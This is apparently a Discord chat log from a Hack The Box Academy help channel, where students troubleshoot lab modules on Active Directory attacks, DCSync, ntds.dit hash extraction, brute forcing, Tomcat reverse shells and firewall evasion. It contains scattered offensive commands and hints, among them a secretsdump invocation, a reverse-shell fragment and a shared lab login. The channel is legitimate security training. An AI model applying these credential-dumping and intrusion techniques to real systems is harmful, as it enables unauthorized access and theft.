#modules

You mean the pty code?

Yes

How do you expect a php code to run python?

You do the pty shell upgrade after connection

?? I don't know what that even means

The image.php is php code

The python pty is... well it's python code

didn't do that module sorry

Ok now I get it, just put it into the terminal once I'm shelled in

the python code is used after you get a shell to upgrade to an interactive shell, it's not to create a reverse shell

Yep

@fathom pendant & @next bronze thank you for the help

Shrimple

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
I have used command for PS:
Get-WinEvent -FilterHashTable @{LogName='Security';ID='4625 '} | Select-Object -ExpandProperty Message
And I have already tried all variants and no one is correct answer: user0, user1, administator, NOUSER

if anyone is running vmware workstation pro 17.5 and has issues of your vm freezing there's this nifty button i just discovered that helps you clone your vm and make it compatible with the latest version of vmware workstation pro... no freezes so far after creating a clone and upgrading it

Anyone has ever met this error ERROR kull_m_rpc_drsr_getDCBind from mimikatz DCSync, in such case does exist any workaround? because what i found on Google is that it does not.

How does your full command look like?

This should be working AFAIK, administrator has DCSync rights. In the module its done with noPac.py (which calls secretsdump.py)

Did you try with privilege debug?

yes, but that makes no sense. That is used to dump memory

still i tried xD

xd

i've found some people here referencing the same error but no one answered them

Wait, are you now administrator?

i have his ticket

And trying to get your own hash?

the user im trying to dump hashes of is arbitrary

it is just not working, im going to try if its double hop problem

by doing it from MS01

/user: flag🤔

what

I mean the flag /user:

yes what

Iirc isn't it the target?

what target

i am just trying DCSync from Windows using a ticket obtained with noPac vulnerability

xD, wait a while trying to figure out with checking my notes

its not done in the academy

trying extra stuff to practice

Sounds great

maybe use another tool to dcsync then

Arbitrary is the user you're trying to DCSync right?

But why are you specifying /user: administrator

why would i xd

XD¿

Xd

should work with mimikatz

Okay, I thought the user is "arbitrary"

HAHAH

But actually you're specifying yourself as a target with /user:

I mean you're now trying to get your own hash

It could be the reason why is it not working

But i am not sure😵‍💫

no lol

Module Broken Authentication
Question: Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

So far what I have done:
||1. Issue a curl request to get the token for htbuser
2. extract the date into a YYYY-MM-DD hh:mm:ss format
3. feed the format into bash's built in date function to transfer the date to millis
4. feed the produced millis to a modified reset_token_time.py script, that uses the name "htbadmin" + the time in millis to create the md5 hash and use the produced hash to make a request to the "check" to verify if the token is valid.

I have actively tried debugging the issue to discover where in the steps I am going wrong (I assume in the last) but I have been unable to figure it out. Feel free to PM me for this issue.
||

did you convert to epoch time

Yes, I have stated it in the steps I have taken.

hey guys i am new in this server , so please tell me about this server and modules actually i dont know coding really but, i think im going to learn new in this server

if it is working from the MS01, can it be Double Hop problem?

How can I "host discover" my hackthebox target machine?

Anyone free to talk about the Web Attacks Skills Assessment

hello guys on FILE INCLUSION Log Poisoning section i have the flag but its not woking can somone check for me

its it the fact that im using remmina to rdp and it keeps disconnecting? would other tools make it better anyone had the same issues?

when i need RDP i do from Windows

only using xfreerdp for pth

did you set the username as htbadmin to generate the token?

xfreerdp has never failed me

keeps disconnecting on both

especially after i type stuff in cmd

use tcp for vpn

im now trying it on pwnbox

I am stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS: DCSync

Every time I try to log in with the given cred but it fails with powershell ran as Administrator
I am using
User: htb-student
Password: HTB_@cademy_stdnt!

Can some one help me?

Can you explain a bit on how to do it

I am also facing the same problem

I have the option to download the VPN file
But to configure... ???????

go to vpn settings > select TCP 443 > download and replace your old .ovpn file

Thanks!!!

would you know why mimikatz pulls that error if and only if the TGS is for CIFS? or this is just some mistery around mimikatz behaviour?

i got the DCSync with a LDAP TGS

tbh I don't use mimikatz for dcsync, but you requested a LDAP tgs and it worked?

yes xd

idk any other way to DCSync from windows :S

my objective is try to replicate all techniques as possible from Win and from Linux

relying a lot on impacket is not helping me

like what if i dont have access to impacket in a real situation

you can use rubeus no? nvm I don't think you can

secretsdump))

oh! mimikatz use LDAP to do the memory dump

has to be that

i've never seen let me google a little

there's also Invoke-Mimikatz

yea i have it but its not different from mimikatz.exe

nice call boys vpn to tcp made it stable

ty

For an undocumented reason, Impacket's secretsdump relies on SMB before doing a DCSync (hence requiring a CIFS/domaincontroller SPN when using Kerberos tickets) while Mimikatz relies on LDAP before doing the DCSync (hence requiring a LDAP/domaincontroller SPN when using Kerberos tickets)

well, the "troubleshooting" made me learn some stuff

great

interesting

a lot

time for a rest

brain is 🔥

same bro this pivoting module is hard for me

atleast got the flag now

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
I have used command for PS:
Get-WinEvent -FilterHashTable @{LogName='Security';ID='4625 '} | Select-Object -ExpandProperty Message
And I have already tried all variants and no one is correct answer: user0, user1, administator, NOUSER

lab is only active for 89 minutes... any hints for finding better wordlists?

Use the provided wordlist in the module.

are you running the command on the right machine? the question asked for an account on the domain controller

what is domain controller? I autorized like usual by ssh to the target

go back to the earlier sections and review the content

In the Sub-domain fuzzing section of Attacking Web Applications with Ffuf, it asks to fuzz a subdomian of inlanefreight.htb. The problem is, it doesn't provide a way to spawn an instance to target. Any one dealt with this before?

https://www.inlanefreight.com/

Thanks. I swear I tried that, but must have had a typo

you wrote .htb

99% that was your typo

Probably lol

Seeing as how I just made that typo 3 more times, I'm going to go with yes, yes it was

What's with HTB and inlanefreight? They use it everywhere

its just a persistent story for the labs

Does HTB have no power in removing academy skills assessment solutions from youtube?

You can report them via the /spoiler command in the server

I reported them 2 months ago and nothing happened to the channel

He just keeps posting more and more spoilers

i'll double check, hopefully there would be a resolution to this

then don't watch them? what's so hard about that lol

they cant just tell YouTube to remove those videos unless they are infringing some copyright

sadly…

dont search for them (?)

guys, what do I do when I'm stuck?

Precisely I'm stuck in the Getting Started module in "public exploits".

you've only nmapped; why not try other methods

I assumed I'm supposed to look at the services on the target and find any exploits related to them

you are given an explicit ip and port combination

web enumeration is a thing

ooooooook thanks

Hi guys I stuck on "SQLMap Essentials " ==>> "Skills Assessment"
I got the -T final_flag but I can't C the content ...

I tried to C if I have write permissions (maybe trying RCE) but: "current user is DBA: False"

so I'm stuck don't know how to continue...
someone can give me a hint please?

😭 😭 😭 😭 😭

yes i have the adunn password
But i am supposed to rdp to the machine with htb-student and then open powershell right?

Man... I am really facing with this RDP

Yes

Point to be noted..!
Ahh man.. this is really a pain 😭

BTW solved the password and hash

Thanks

Where is the LINUX01$ Kerberos ticket for the question:

"Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). "

In linux pass the ticket

It's in an uncommon directory
var /___ /___ /.........

I saw that with linikatz, is it this one?

I don't even know which one I'm looking for

nothing says linux01

oh, I see it now, nevermind

I imported it and it worked fine, thanks. Linikatz was the way to go on that one.

just wrap it in backticks /var/...

Yeah... 😅

For the question:

Use the cracked password of the user Kira, log in to the host, and read the Notes.zip file containing the flag. Then, submit the flag as the answer.

I was able to find the Notes.zip, but it's in the root folder. I don't have access to the root folder.

Also, kira user has two passwords?

Doesn't make sense.

Nevermind, the locate option didn't work properly.

It was in the Documents folder, not root.

do yall have off topic?

nvm

Hi there, I am new to Linux and I struck on Linux Fundamentals print. How do I figure what is the path to thb-student's home directory.

Try ||pwd||

also you can check the environment variables

someone?

so, you're able now to list databases?

Hey guyz, I have a quick question about Active Directory Skill Assesment 2.

yes found it in ||production||

but can't C its content ...

In one of the question, they asked to connect to a MS01, we can do it using a specific account got before

How that specific account can work on MS01 as I thought it was a local account

list also other databases, probably you will find

You can DM me for more details, I didn't want to spoil

which question?

Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

so you were able to connect to the sql01 right?

Yes

I finished to answer the question

Because I followed some tutorial and help online

DM, there are a couple of ways

I'm stuck at module Attacking Common Services the first exercise Attacking FTP. To the point that I think the machine is broken. The task is to access the FTP server but no port is open revealing FTP. I got into the machine a different way and according to systemctl the service proftpd failed. :S

Also reset the machine and waited > 60 seconds after IP appears as per the instructions.

Which port did you scan ?

All ports.

But looking at #858470491676737536 it seems the box is just super unstable and requires 3-4 resets before it boots correctly. Earliest mention I could find is a month ago, seems it has not been fixed.
I'm getting increasingly frustrated with HTB academy.

I think it happened to me too by the past

Don't worry, not every machine work this way

I might have been lucky but I was able to find the service

I can pm you my nmap output if you like

On my third or fourth reset now and finally a promising port showed up.

Here you go !

Does anybody succeeded to install bloodhound on parrotOS ?

When installed it threw me errors corrected with that link

https://aut0exec.blogspot.com/2022/08/installing-bloodhound-on-parrot-os-51.html?m=1

But when trying to put a collection in it, it shows me upload complete and 0%

Which seems to be a trouble from the version 4.0.3 of bloodhound

https://github.com/BloodHoundAD/BloodHound/issues/402

So I tried to install another version 4.1.0 which is not visible from apt i think

make sure your collector is the right version for your bloodhound installation

Mmmmmh, I gathered my collector from sharphound

Which is not the same version as bloodhound

sharphound v2.0.0 for bloodhound v4.3

Where did you get that information ?

Which version do I need for bloodhound 4.0.3

it will tell you which version it's compatible with when you run sharphound

why are you using such an old version

Because when I apt get install bloodhound it's what apt give me

I tried getting the latest version from the zip file in the release but I don't know how to install it

the version available in apt is 4.3.1 I think

└──╼ $sudo apt-get install bloodhound
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
bloodhound is already the newest version (4.0.3-0parrot1).
The following packages were automatically installed and are no longer required:
gconf-service gconf2-common libc++1 libc++1-11 libc++abi1-11 libgconf-2-4 libopengl0
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 290 not upgraded.

When I tried to install from the following link https://github.com/BloodHoundAD/BloodHound/releases

I download
BloodHound-linux-arm64.zip

But when I launch the Bloodhound in, it does nothing

even with chmod

should be just ./bloodhound --no-sandbox

bloodhound itself is really just an electron app

Mmmh, it looks that I made a mistake

BloodHound-linux-arm64.zip

Was wrong

I had to install BloodHound-linux-x64.zip

Thank's XreOuS

Now I have to fight to upgrade neo4j... Dependency troube are never over...

Module: File inclusion
Section: Upload exploitation
Are you suppose to be able to get a reverse shell? I've tried both the one from pentestmonkey and msfvenom without no luck

There also is BloodHound CommunityEdition, which provides a docker-compose file. No dependency trouble there.
https://github.com/SpecterOps/BloodHound
Although I haven't used it much yet. The interface is changed and I'm missing the clickable default queries.

Thank's !

a lot of things are missing from bloodhoud CE, wouldn't recommend it unless you know how to write your own queries

I'm just trying to finish Active Directory Attack module

think you need a webshell instead

I solved the flag with a web shell

but since the session brings up reverse shell, I assumed it would be possible as well?

normally yes, but the target in the lab in a docker container

ok

cause this looks correct right?

and i have uploaded the shell and visited the upload/shell.php url

yeah looks right

ok, then Iguess its time to move on

lucky me that I didn't spend a hour or so trying to solve this...

i got a reverse from the webshell

bash -c 'bash -i blah blah'

can someone help me with the footprinting medium lab? i need some hints, im not sure where to head next

hi. i have ssh into t** and didnt find anything useful in the directories other than his own ssh and sql history. could you point me in the right direction on how to move forward?

What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
Firstly, I connected to the target (user10 in this exersice) after that found out domain controller "ACADEMY-ICL-DC"
I have used command for PS:
Get-WinEvent -FilterHashTable @{LogName='Security';ID='4625 '} | Select-Object -ExpandProperty Message
And I have already tried all variants and no one is correct answer: user0, user1, administator, NOUSER

Share module name

And section

my guy, I already told you to run the command on DC

I have done it there too, but still getting the same results

what's DC's hostname? you found the DC but did you run the command inside DC?

Host Name . . . . . . . . . . . . : ACADEMY-ICL-DC

did you then ssh into dc and run the command?

Yes, I connected by ssh user10@172.16.5.155

oh, I see that now, I guess that found this

Why do I can't start the next module (INTRODUCTION TO BASH SCRIPTING), if I have completed all the previous ones? There are not enough cubes

hey friends, i am at Attacking Enterprise Networks - Active Directory Compromise, when trying to kerp i get this error Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) , googled it and found i have to use the tool ntpdate or rdate, tried them with proxychains but didnt work, any hint please?

Ntpdate is the way, you just need to figure out what it does and how you can use it

Can I use a file to mention username formats in username anarchy if so which option should I use??

Hi guys,

i need a nudge for the password credential hunting in windows module. I got the credentials for winscp, but they seem to be wrong, or at least give me access denied. I also tried the other ones and every combination of username and password (i think at least). I cant seem to get it to work. what am i missing?

not sure what U mean?!
I got 2 database:
||information_schema||, || production||

Hello, all. I've signed up for the HTB Academy Silver account and am doing CPTS now. I on the "Getting Started" module and they are doing the Nibbles machine. It says I can't play the machine unless I sign up for $14/month. Is this true? I kind of assumed the machines in the course would be already paid for. Just wanted to verify that in case there's a "free" way.

Is your subscription active? Do you have the annual subscription or the monthly subscription?
With the monthly subscription you only get a number of cubes and then have to buy the modules.

I have the annual Academy subscription. Nothing on the labs. But, I think I just needed to scroll down more because there's an option to spin up the target machine. Thanks

did you check tables inside them?

Anyone else having an issue getting the inbrowser OS to start up?

i need help with Footprinting hard lab im close to finishing it :3

What did you try, what are you stuck on

dm me what creds you have

do i dm u?

No you don’t

okay, i got to a point where i accessed credentials specifically and this is where im specifically at, ||toms password and i have SSH'd in but i dont know where to go next, i have tried to read the bash_history files and sql_history but i cant seem to figure outwhere to go next||

I used toms creds for imaps

okay ill try that

how to do this

i have his hash but i dont have access to DC01 which is internal

i did that too and i ||ssh'd in||

If you got the key from IMAPs, you can ssh to root

to root?, let me try

oh it worked!, thank you im confused how i never thought of that

I am doing Network Enumeration with Nmap module and on service enumeration part while solving the question I am confused and stuck which service has the flag? can anyone give me some sugestion how can i solve it?

Doesn't the section tell you that sometimes you'll need to use netcat to connect to a service?

yes I tried to coonect to service but I am not sure which service has the flag?

or after connecting to service what should I do in order to get a flag?

username-anarchy/username-anarchy -i users.txt -F rule.txt
Can someone help me with this tool please?

%F%M%L
%L%F
%f%m%l
%f%l
%l%f

This is the rule file I created

Just wait, usually takes~ 10-15 seconds to spit it out

This is the output I get

ok i will try it again...thanks🤘

does it support rule files?

I dunno

I checked the readme there was no mention of rule files only single formats

then it probably doesn't

ok thanks

Awesome!

HI! i got stucked at Attacking Common Services medium skills assessment i tried to bruteforce the open ports with no luck, but got the dig AXFR subdomains and thats it, can someone help please?

did you scan for all ports? there is a service on a non default port

Yes i found thatone and tried with hydra

Did you specify the port with hydra?

yes

The specific thing ||ftp://ip:2121||

here 👆

did you find more ports?

found 5

which ports?

-p-

so far these ports: || 22, 53, 110, 995, 2121 ||

scan with -p-

i started doing thatone thank you

good luck

found it thank you

that lab was fun

@oblique spoke tell us if u need further assistance

Hi all, I am struck with this question in Linux Module "What is the path to htb-student's home directory?"

echo $HOME

I have already tried using the pwd and echo $HOME command.

/home/htb-student

Thanks, it worked.

You're meant to spawn target and ssh to it

Read just above question 1

enough if you said only 'read'

Whenever you see Target: Click here to Spawn the Target System above a set of questions... click it

You spawned the pwnbox

Okay. I am still new to the Platfrom. Trying to learn it.

This is taught in Intro to Academy Module

Aka the first thing

Lol, I jumped over to Linux Fundamentals module cause I wanted to try out Linux with School.

https://academy.hackthebox.com/module/details/15

This module

It's still good to know how the platform works 😉

Thanks, I will try to complete it first and then continue with the Linux module.

Much appreciated!

It works well, but I also had to look for another way. Without spoiling, I can say intercept with burp and use burp to look for what you are searching. Developer tools from browsers are also a very good option. The original bash script and the curl from the course module don't work for me either.

Hello Guys,

PetitPotam section:
how do we know this is the target --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp ?

If it's about attacking certificate authorities then that's probably some sort of default path

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate

but the hostname in the exam wont be guessable xD

you just get hostnames from scanning

The academy host names have been consistent

but also scanning

ofc

they skipped it in the module

that part's assumed to have been done already

its not 🙂

Do you experiment an issue on module ATTACKING WEB APPLICATIONS WITH FFUF with question Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it? . when i use fuff, it runs a few second and slow down the number of reqs to 1 req/s ...but the big issue is that, when i stop the command, i don't have access to Internet and that impact all my VM running with NAT mode. I need to reinstall vmware in repair mode to recover Internet Access.

but a quicker and simpler way is running certutil.exe from a domain joined host

to obtain certificates?

to obtain the hostname

Hi I am in the Active_Directory and ntds.dit section of password attacks and have successfully captured the ntds file. How can I extract the hashes from it?

That's a personal problem my guy

not if you don't have access to a domain joined host

Read the section

i should be scanning the 172.16.4.0/23 is what u mean

but im not doing that at this moment xd

not enough energy

I read but there was no mention of anything to extract the ntds contents. In the last section of LSASS attacks there was mention of a tool pypykatz but I read the help of it there was no ntds in it

The ntds should have the hashes in it iirc if you just cat it

wait what you cat ntds? lol

No

its a fkn binary

encrypted data

It's been a minute since i did that module

so

I tried to use cat on it but it turned wierd

XD!

:^)

sad my terminal crashed

A Faster Method: Using cme to Capture NTDS.dit

Just use secretsdump

check this out

I did do it

mate literally run netexec with --ntds flag

and it returned plaintext

yes I am saying it works

I just wanted to know a method for doing it the long way

just for notes purpose

secretsdump

^ for offline dumping

or the Golang version

better for big NTDS.dit files

https://github.com/c-sto/gosecretsdump

ok I will try it

but netexec just does it for you

🤷

They want to do it the longer way

okk

They explicitly said it

issue 1 more command

to get the same result

🥱

^

sometimes the longer way is more reliable ¯_(ツ)_/¯

to use the secretdump do I need the hlkm\system file?

why are you not reading the documentation

I read it

I believe so

my bad

I used the help option

not the readme

But not 100%

secretsdump -ntds ntds.dit.save -system system.save LOCAL

¯_(ツ)_/¯

do I need to install from the repo or just cloning will work because I am getting an error

Ok i got it

hi all

any idea of this?

Hi

I'm stuck in the Nmap module in the hard IDS lab, but I red the walkthrough and solved it, I need to know why we use nc --source port 53 and why ports 80 and 22 didn't work?

you should use the binary from release

Hi guys, i just arrived on the server. I'm really stuck on Password attack - Protected files, the description says that we should use the cracked password of Kira's account but i don't see anything related to the user kira. Nothing in /etc/passwd and LaZagne didn't found anything. I'm really starting to struggle with this

you're specifying the source port of the scan with --source-port, port 53 is the dns port. it should've been mentioned in the module

look for the file id_rsa

but during the scan both UDP and TCP ports on 53 are closed, how the connection occur ?

I'll try, thanks for the hint

Hello excuse me I don't undestand, where is flag?

typed the wrong thing, my bad, --source-port sets the source port for your scan. from the receiver's perspective, the traffic will appear to be coming from which ever source port you have set

i am confused because ports 80 and 22 are open, and the connection not been initiated

the flag will be pretty obvious, it's not there

what

during nmap scan the port 80 is open, when i use nc -nv -p 80 TARGET PORT , THE CONNECTION REFUSED

is PetitPotam attack possible over a pivot? I ask because evertyhing for this attack is done through a machine domain joined and in the exam this can be different.

just because it's open doesn't mean you can nc to it

I get it, thanks 🙂

I'm able to get a response using this command, maybe you did something wrong there. anyways port 80 is a http port, more than likely you can just go there in your brower

can you please give me the command you used ?

same as yours

and you got the flag ?

no? the flag is not supposed to be there

nc doesn't tell you the service version, need nmap for that

the destination port in my case is 50000 , so it is make sense ?

I think anything relay is quite difficult if not impossible over pivots, you need an internal host to stage it

got it

i forgot to port forward the 445 :whoops:

in this case is not a relay but just a spoofing i think xD

huh?

but cool i got it with ligolo-ng

hello guys, i need help with AD enumeration & Attacks skills PART 1, when i upload chisel.exe, this error apear

i used this command nc -nv -p 80 tragetip 50000 but the connection refused even the port 80 is open

Is it possible for someone to explain cd.. command in simple words? Sorry, I am confused right now.

hey is there a way to use light mode in htb academy

you're asking why even though port 80 is open on the target, specifying 80 as the source port doesn't work? also spoilers, remove the command please

rn my eyes can't focus in dark mode

someone?

dark reader extension but set it to light mode

yes this is the point i did not understand

dm me with more info

nah it make light mode like yellow

port 80 being open on target means nothing, in your scenario, the target probabaly disabled traffic from port 80, port 53 is for dns traffic which is usually more trusted https://nmap.org/book/firewall-subversion.html

you can adjust the scheme and mode

it only work with static mode

change your current directory, it's like you double clicked to open a folder in windows

this is what i get from force light mode

Cd, change directory

I tried to look for id_rsa but there is nothing in .ssh/

thanks

If that’s with the hint LoveYou or something like that, use the hashcat rule on that and bruteforce Kira

Nice try but there's no hint for that question

lol I would check it but I don't have the password for the user

If i try to login locally, the user kira is not even recognized

what's the user you used to login?

htb-ac-737093

There is no username or password given

Are you ssh to the target?

so you didn't ssh into the target?

No i didn't, i suppose kira is the user i have to use to connect to ssh but i don't see how to get its password

oh it's this one

mutate the password list given with the rule, then use that to bruteforce ssh with the user kira

Oh ok i'll try that tomorrow, thanks for your help

might want to do it overnight cause it's gonna take a while lol

I wouldn't brute-force SSH

me too but.. you're supposed to for that question

if it's the question I think it is, you can, but you don't have to, it just says to SSH in to get the flag, but there's other services running

ah ok that's probably the better way, can't remember how I did it

:S

any caveats i am missing?

Is there anyone I can connect with and gain knowledge from?

Why am I getting this error while I use smbserver.py to copy from pwnbox to victim?

Greetings!

gain what knowledge?

hello

i am doing the Attacking Tomcat module in CPTS

i need some sanity check

if its possible

you have to setup credentials

Obtain remote code execution on the http://web01.inlanefreight.local:8180 Tomcat instance. Find and submit the contents of tomcat_flag.txt

I think he just can't write to C:\, you don't always need to set up creds

this is the last question

going through the examples none of its works i guess it is intentional?

You can brute other services

it worked

from some version of Windows onwards you need to

I think you just upload a war file

if i try to upload war file it just hangs

i also modified the jsp file as mentioned in the module to bypass

that should work, I don't remember doing anything special for that section

doesnt work

https://i.imgur.com/SHGegJZ.png

my connection is good though firewall off

you sure about that? just tested on a win11 host and it works without creds

reset maybe? pretty sure you jut need a war reverse shell for that

i resetted 3 times

the same

i wonder maybe it is intentional that it hangs

in my Win11 it doesnt work

i get authentication error

it is related with the Guest access

@next bronze can you try if it works for you?

I'm not sure, mine is just a standard win11 install

me 2 🙂

as i told you it does not work without credentials

https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/guest-access-in-smb2-is-disabled-by-default

i think you have some extra setting

by default it is disabled

Starting from Windows 10, version 1709 and Windows Server 2019, SMB2 and SMB3 clients no longer allow the following actions by default:

Guest account access to a remote server.
Fall back to the Guest account after invalid credentials are provided.

I have yet to encounter a windows machine that does that

does what?

needs creds to access smb

fresh install Windows 10 v1709 or newer

and you will get it 🙂

can you read? i think you are a smart individual, it says by default on Win10 v1709 onwards

you had to disable it in Win11

Ive see it

its why impacket lets you setup creds for it too

it was introduced in Feb 2023 tho

nvm

it is the article date

https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/

October 2017

isnt this just for enterprise?

no

idk, I just tried on my win11 without creds and it worked

let me share the error with you

wrong mention

I just used a regular msfvenom payload and it worked

I'm not saying that you're wrong, just that I have yet to see a machine that needs creds for smb, be it win 10 or 11, relax

i tried this too but for me i cant upload the file on the page

@next bronze interesting it must be my browser than fuckin firefox.. i tried now with chromium and it instantly uploaded..

i wonder what is the reason

I used firefox

He guys, here's the another question; I need your help.
Question: What is the index number of the "sudoers" file in the "/etc" directory?

Perhaps when you spell it right?

Lol, that was cruel. Thanks, much appreciated! @analog dock

use tab completion, can't spell it wrong if they fill it in for you

So, I ended up using the cd /etc then stat /etc/sudoers

Hi, I'm having trouble connecting the VPN in my own VM. I use a Kali virtual machine in a Windows OS. When I try to connect to the academy VPN using openvpn it connects but nothing works later, I mean, the academy web page can't charge

I don't know what is happening because when I connect to the VPN with windows and then I open the VM, it works, but when I connect from my VM it doesn't

maybe have a look at network settings of Virtualbox or VMware.

It's in NET option

what's supposed to change there

I would like to connect to the VPN directly in my VM because it's from where I'm working

I know that, have you tested if you could connect to any of the module targets?

wdym "academy page cant charge"

I can but then I cannot submit my answers or change sections because the webpage can't load any content

It can't load. Sorry, English is not my native language

the academy vpn shouldnt affect that at all, odd

yeah you don't need a vpn to load the academy webpages

Oh man. These hydra attack modules get me every time. 72h of bruteforce remaining. Hoping that admin is the right username.

But do I need it to connect to the section target?

what?

72h?

And it also happens when I'm working on starting point in HTB labs :'(

well dont load the academy vpn while doing starting point

I mean, the starting point VPN does the same thing

It's not just with the academy VPN, it's all VPNs

vpn connection in your vm makes the pages not load in your host?

If by host you mean windows os, no, it works just fine. The problem comes when working in the VM

why not access them from windows then, you don't need vpn to load academy pages

is this the exam?

Yes, but it says this:

what about it?

It says to download a VPN connection file and I guess it's for connecting to the target

Isn't it?

yeah, you connect to it in your vm

Yes that's exactly what I can't do

Because then the webpage can't load if I'm connected to the VPN

And then I can't submit the answers

hence I asked this, connecting to vpn in your vm makes it so that you can't load pages in your host (windows)?

No

Anyone know why I get this error when running dacledit.py?

so if you're able to access academy in your host, you can sumbit answers there

Yes and I found out now that the user was not admin. 😂 i read the hint.

But it's uncomfortable to work like that, that's why I'm trying to solve this. Maybe now it's just for the academy but I need to do more things and maybe it's not a good way to work. Anyway, thanks!

ok I see what you're trying to do. connecting to vpn shouldn't break other pages, make sure your vm network adapters are configured right, reinstall openvpn, restart

you need to also get the additional module in the PR

I found the msada_guids.py that is in the /impacket directory. I copied it over to the /examples directory and it still does not work

What is the 'PR'? Sorry, I am not much of a programmer so I don't know what that means

/usr/lib/python3/dist-packages/impacket/msada_guids.py

I should copy the msada_guids.py file to that path?

dacledit.py is not in the main impacket branch, it's still an unmerged pull request for now

My network adapters are on the NET option, is that correct? And, since I'm working in Kali, openvpn came preinstalled, how can I uninstall it? Sorry I'm kinda new to this

yes, but first make sure the other impacket modules are in there

Here's another question.
What is the name of the last modified file in the "var/backups" directory?

adding a bridged adapter might be useful
sudo apt remove opevpn then sudo apt install openvpn

I am not seeing msada_guids.py in that path...I will copy it over. I do see the /impacket and /impacket/exampes paths

I copied the msada_guids.py to /usr/lib/python3/dist-packages/impacket/ but I keep getting the same error

hmm did you get those two files from github?

Guys, any hints for this question?

google "ls show last modified"

I am pretty sure I did, but it was a while ago.

I remember using dacledit when I ws doing the DACLI module and it worked just fine...now it throws that error

what's your impacket version

The impacket I am running from my home folder is impacket==0.9.25.dev1+20230823.145202.4518279

I have another installation in my /opt folder...the /opt one does not have dacledit

thank u! is there anything special I have to do when I change to bridged adapter?

you might want to update it, the current dacledit.py is for v0.11. dm me

nope, just add it in your vm's config

How do I update it? I have been trying python setup.py install and then python -m pip install -r requirements.txt

okay thank you!

use pipx

and remove the old versions if dacledit is the only modification you made

So pipx install -r requirements.txt?

python3 -m pipx install impacket

This is where I got the other version of impacket that I installed on my home directory: https://github.com/ShutdownRepo/impacket/tree/dacledit

Anyone on that is familiar with searchsploit? Working on the knowledge check for Getting Started. Did the scan, used searchsploit to find the exploit, but not sure what to do next. Went back to the lesson and it only showed how to search, not how to use the exploit.

oh you're using that branch, I'm not sure if it's up to date with the main branch tho, it's better to use the main branch then make changes when you need to. up to you

I got it to work! I forgot I needed to set up a python environment first, just like in the DACLI module

depends of if it's a metasploit module, if it is, it's available in metasploit in the same name, if it isn't, use

searchsploit -m <id>

to copy it to your current dir, then open it in an editor, there should be instructions in there on how to use it

nice

Thanks for your help! I appreciate it!

@next bronze so I think I missed a step which is causing some of my confusion, I've been footprinting but can't find anything that would help me get in to get a foothold

Been looking at the source code and haven't been able to find anything

Here's another question.
What is the name of the last modified file in the "var/backups" directory?

did you go visit the target in your browser?

@next bronze yes I'm at the target in the browser, I'm inspecting the source code but can't find anything in the HTML

don't need to look at the source code, what you need to exploit is right in front of you

you're asking about the Public Exploits section right

@next bronze so I'm on the last page "Knowledge Check". I'm trying to gain my foothold into the target but I'm not finding anything on it

@next bronze I got in... sometimes trying the most basic thing is the answer

Any help for this one?

i understand you now, impossible to make a DCSync from windows probably due to Double Hop but got it working at 1st try with secretsdump.py 🤷

yeah maybe, secretsdump.py is bae for DCSync

i finally completed the room. i thought the ssh keys were to ssh into toms.

Hello,
Can I ask advise on modules path here ?

sorry new to this discord thing and hackthebox aswell!

Just ask your question

Read #welcome

I have 6 years of experience in WebDev and think about switch to webapp pentester. So I am interested to the do the job role path for pentester.
My question are :

• Base on 3day/week of study, is 1 year enought to complete those modules ?
• Should I study other module before staging this one ?

Information Security Fundamental path is recommended as pre-requisite knowledge

Hello everyone 👋🏻

can someone help me with the 'attacking web applications with ffuf: skill assessment-web fuzzing' module, ive been stuck in a quest that says "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?". i found a page that does: http://faculty.academy.htb:47456/courses/linux-security.php7 but it keeps giving me a wrong answer. any help would be appreciated

nvm i just found the answer. instead of the actual port i had to type 'PORT'

dont know why its like that but whatever

because the port is randomized on instance spawn but the answer box isnt dynamic enough to adjust accepted answers.

hi guys i have a question technical if someone have iis7 that means he have windows server 2008 he can change the iis7 to higher version or he need to change the whole windows server version to higher 2016 or later?

from INFORMATION GATHERING - WEB EDITION
IIS 7.0-8.5: Windows Server 2008 / Windows Server 2008R2

hi am new to ethical hacking and i found hack the box i think this is a good place to learn many things about ethical hacking, but i don't know which path is best for begineers. Can someone recommend what is the best path for beginners in the "path tab" in the hackthebox's website.

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

hi friend, sorry for late reply, with "proxychains ntpdate -qu 172.16.8.3" i got "ntpdig: no eligible servers"
i searched for it and cant find any useful info about it

I should have read your post before closing my pc 😅 now i'm stuck with that 60h bruteforce. As @hallow kiln said i tried to nmap the target and i found an ftp service and 2 smb services. I didn't found anything interesting yet

You can brute force a different service, FTP is much quicker

And you can use more threads for it, 48 is good

Yep but it takes 21h to bruteforce it

Ah yeah i'll try that way

Something's wrong tbh, cause even brute-forcing SSH shouldn't take 20 hours much less 60

try without the -qu flag

It says 1h44 with -t 48. I think it will do the job. Yeah 60h is really ridiculous i don't know it takes so much time with one user

In any case thanks for your help

you're using the mutated wordlist and not rockyou right?

Yeah i mutated password.list from the ressources and i used the rules packed in

guys

i really need help...

with cURL

(CTF)

@hallow kiln do you remember if in the AD module you could map domain trusts with Bloodhound? i get No returned data from query but the section indeed shows the data returned correctly

